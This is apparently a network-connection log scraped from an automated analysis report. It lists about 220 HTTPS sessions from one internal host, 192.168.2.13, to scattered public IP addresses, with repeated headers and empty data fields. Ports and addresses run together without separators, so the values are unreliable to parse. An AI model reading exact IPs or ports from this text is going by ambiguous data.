                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16177192.168.2.1336418217.53.32.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16178192.168.2.1345238147.14.88.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16179192.168.2.1356764201.54.189.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16180192.168.2.1346358105.239.226.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16181192.168.2.1341316139.11.91.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16182192.168.2.133762012.135.182.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16183192.168.2.135834073.7.167.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16184192.168.2.135576053.237.167.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16185192.168.2.1342272189.246.148.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16186192.168.2.1335040159.162.79.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16187192.168.2.133349040.29.172.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16188192.168.2.135025036.161.187.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16189192.168.2.134293637.232.139.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16190192.168.2.1349228159.20.16.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16191192.168.2.134552650.181.16.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16192192.168.2.135724027.239.34.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16193192.168.2.134765814.149.72.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16194192.168.2.135904267.21.184.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16195192.168.2.135840899.155.78.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16196192.168.2.135864261.40.226.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16197192.168.2.1355338177.233.234.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16198192.168.2.135331652.245.208.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16199192.168.2.1359830197.129.127.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16200192.168.2.1351908153.99.157.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16201192.168.2.135534245.82.172.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16202192.168.2.1356068134.69.68.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16203192.168.2.1348210219.199.3.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16204192.168.2.1351472136.59.187.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16205192.168.2.135174489.74.75.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16206192.168.2.135412063.84.43.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16207192.168.2.1357566153.108.240.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16208192.168.2.1334422145.215.131.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16209192.168.2.1345128175.5.23.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16210192.168.2.134345214.253.110.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16211192.168.2.1343208170.163.17.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16212192.168.2.1350362172.57.158.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16213192.168.2.1338826106.143.102.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16214192.168.2.1336732220.25.47.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16215192.168.2.1343230219.15.19.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16216192.168.2.1351008188.175.132.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16217192.168.2.1359224150.145.92.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16218192.168.2.134058688.26.92.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16219192.168.2.135402231.168.213.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16220192.168.2.1338238173.237.149.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16221192.168.2.1359740124.209.227.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16222192.168.2.1359676159.253.128.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16223192.168.2.1344926133.19.122.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16224192.168.2.1345192222.156.137.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16225192.168.2.1336694189.167.55.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16226192.168.2.1332904175.16.206.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16227192.168.2.1350854171.30.49.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16228192.168.2.134000667.40.237.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16229192.168.2.1348490121.235.168.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16230192.168.2.1337622118.207.71.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16231192.168.2.135443457.254.218.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16232192.168.2.134115641.102.176.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16233192.168.2.134156432.184.233.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16234192.168.2.1346940107.33.217.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16235192.168.2.1356548200.223.195.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16236192.168.2.1352106102.237.151.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16237192.168.2.134798454.56.141.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16238192.168.2.135061881.98.37.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16239192.168.2.1360896137.227.76.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16240192.168.2.1346866117.149.119.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16241192.168.2.134905037.103.249.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16242192.168.2.1346316166.253.215.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16243192.168.2.1337592145.234.186.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16244192.168.2.1333432196.24.109.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16245192.168.2.134596268.10.121.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16246192.168.2.1336984132.18.50.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16247192.168.2.135420240.154.204.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16248192.168.2.1351276119.65.164.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16249192.168.2.134840057.82.74.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16250192.168.2.136049691.27.193.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16251192.168.2.134124859.240.194.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16252192.168.2.1342018188.107.85.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16253192.168.2.135751658.195.81.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16254192.168.2.1334788143.243.253.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16255192.168.2.134494881.122.13.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16256192.168.2.135860648.225.54.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16257192.168.2.13468689.122.42.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16258192.168.2.1360166206.127.199.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16259192.168.2.1347502156.235.233.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16260192.168.2.1355718223.26.5.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16261192.168.2.135703468.71.118.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16262192.168.2.135964493.56.211.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16263192.168.2.1337876133.243.116.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16264192.168.2.1334578128.153.225.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16265192.168.2.1347050211.132.4.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16266192.168.2.1337482192.160.47.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16267192.168.2.134578698.43.54.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16268192.168.2.1353982128.189.54.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16269192.168.2.1352212111.149.179.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16270192.168.2.1351456151.210.63.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16271192.168.2.133651878.79.252.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16272192.168.2.1348942178.79.103.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16273192.168.2.134482682.204.134.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16274192.168.2.13589248.80.106.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16275192.168.2.1348374107.189.144.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16276192.168.2.135549641.84.47.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16277192.168.2.135873292.255.91.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16278192.168.2.1353696179.103.136.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16279192.168.2.135712084.129.37.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16280192.168.2.1359480210.153.168.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16281192.168.2.1343438126.221.230.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16282192.168.2.1353510139.77.31.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16283192.168.2.1352468205.77.220.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16284192.168.2.13431709.106.122.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16285192.168.2.133321066.14.188.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16286192.168.2.134788248.122.213.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16287192.168.2.1352842165.58.152.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16288192.168.2.134828880.68.182.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16289192.168.2.1356452184.238.244.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16290192.168.2.1342854210.104.60.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16291192.168.2.1354538211.82.247.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16292192.168.2.1336494150.68.233.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16293192.168.2.133446661.158.225.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16294192.168.2.1337544138.160.62.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16295192.168.2.134503096.128.58.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16296192.168.2.133305234.151.20.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16297192.168.2.133427074.17.24.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16298192.168.2.1333334223.43.58.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16299192.168.2.1348220206.144.221.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16300192.168.2.1346294218.80.189.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16301192.168.2.133859899.225.75.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16302192.168.2.133785635.68.250.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16303192.168.2.1348392197.223.95.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16304192.168.2.133895842.165.178.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16305192.168.2.135853839.97.62.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16306192.168.2.133999866.24.238.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16307192.168.2.135269825.205.89.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16308192.168.2.1341388113.166.8.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16309192.168.2.1335236122.154.243.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16310192.168.2.134992623.177.91.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16311192.168.2.13407882.0.59.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16312192.168.2.1343496192.34.146.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16313192.168.2.133657023.92.122.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16314192.168.2.135647638.228.119.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16315192.168.2.135508663.192.34.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16316192.168.2.135265214.67.152.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16317192.168.2.1351322113.193.186.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16318192.168.2.134105237.72.69.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16319192.168.2.133787862.212.105.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16320192.168.2.1351074116.188.245.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16321192.168.2.135341884.116.168.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16322192.168.2.135306469.86.227.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16323192.168.2.1337596170.115.134.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16324192.168.2.1357108113.160.88.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16325192.168.2.1348970174.45.168.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16326192.168.2.1352722105.237.114.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16327192.168.2.136019485.104.117.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16328192.168.2.135572087.51.224.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16329192.168.2.1340908187.138.240.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16330192.168.2.133451013.2.124.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16331192.168.2.1341648123.153.49.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16332192.168.2.134448080.86.15.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16333192.168.2.1345676178.80.88.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16334192.168.2.135637266.63.32.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16335192.168.2.1343048198.217.146.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16336192.168.2.133601481.188.223.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16337192.168.2.1352212207.45.60.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16338192.168.2.136036482.137.209.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16339192.168.2.1347118213.211.1.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16340192.168.2.135194077.215.210.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16341192.168.2.1343768152.222.72.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16342192.168.2.1343376179.171.164.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16343192.168.2.136018866.51.40.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16344192.168.2.1345754160.71.82.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16345192.168.2.1344964219.29.43.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16346192.168.2.1334044139.132.67.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16347192.168.2.1354898128.229.106.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16348192.168.2.134054069.72.158.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16349192.168.2.1333764196.7.242.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16350192.168.2.1336300157.133.39.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16351192.168.2.1348882190.122.110.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16352192.168.2.1339428202.225.129.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16353192.168.2.1354072140.151.187.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16354192.168.2.1345448188.64.193.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16355192.168.2.133555436.201.90.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16356192.168.2.1356424125.66.254.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16357192.168.2.1353264110.200.97.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16358192.168.2.1345700150.14.183.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16359192.168.2.1350912123.23.217.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16360192.168.2.1345694129.46.53.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16361192.168.2.1343034157.99.68.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16362192.168.2.1333314112.17.208.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16363192.168.2.1347416198.204.131.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16364192.168.2.1338462123.20.86.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16365192.168.2.135366282.204.36.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16366192.168.2.1344840171.28.9.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16367192.168.2.1356172198.121.147.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16368192.168.2.1351730175.44.48.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16369192.168.2.1341206216.81.209.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16370192.168.2.1336064189.191.215.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16371192.168.2.1336008132.141.230.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16372192.168.2.133957036.155.97.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16373192.168.2.1353310180.122.24.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16374192.168.2.134729234.14.1.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16375192.168.2.1333980218.133.48.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16376192.168.2.135778276.201.200.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16377192.168.2.135658054.185.37.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16378192.168.2.135854235.5.3.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16379192.168.2.134983499.102.153.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16380192.168.2.1341936109.90.18.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16381192.168.2.135222477.29.254.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16382192.168.2.1358228188.210.252.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16383192.168.2.135208617.112.124.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16384192.168.2.1344076208.131.143.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16385192.168.2.1350506222.166.81.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16386192.168.2.134248492.123.203.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16387192.168.2.133645047.121.36.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16388192.168.2.1357380112.160.52.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16389192.168.2.135125257.17.105.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16390192.168.2.1333722184.81.152.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16391192.168.2.1343768180.63.90.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16392192.168.2.134252481.152.101.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16393192.168.2.1341256219.39.31.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16394192.168.2.134747468.59.132.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16395192.168.2.1359226122.89.69.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16396192.168.2.133703045.67.169.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16397192.168.2.1340946140.90.53.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
